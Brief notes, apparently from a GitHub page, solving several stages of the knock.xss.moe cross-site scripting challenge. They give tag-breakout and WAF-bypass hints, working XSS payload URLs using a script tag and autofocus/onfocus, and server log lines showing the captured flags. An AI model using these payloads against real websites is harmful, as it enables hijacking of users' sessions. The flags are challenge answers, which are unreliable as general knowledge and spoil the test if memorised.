You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
- you need to bypass the <a> by </a> first, then implement XSS attack
e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='</a>"><script>alert(3)</script>
Similar as Stage 4, you need to bypass textarea in this time
133.130.88.37 - - [23/Apr/2018 22:17:54] "GET /?flag=FLAG{57a968be0c6c0ba1dbc8a222488358366fda4edf} HTTP/1.1" 200 -
Stage 6
- Similar, but you need to bypass XMP tag
- 133.130.88.37 - - [23/Apr/2018 22:20:40] "GET /?flag=FLAG{66cd945a9de10077c24fc13b0834eec04a16df0c} HTTP/1.1" 200 -
Stage 7
- You need to bypass WAF by using onfocus autofocus tag
- 133.130.88.37 - - [24/Apr/2018 01:21:48] "GET /?flag=FLAG{73fd502659f04529e689fa1e4782bc2f5ebbcea0} HTTP/1.1" 200 -
- Still using autofocus onfocus tag bypass ""
- http://e461f5f6c542ae79ccc144093c63d0b074e591cd.knock.xss.moe/?q=123%20%22/%3E%20autofocus%20%20onfocus=alert(1)
-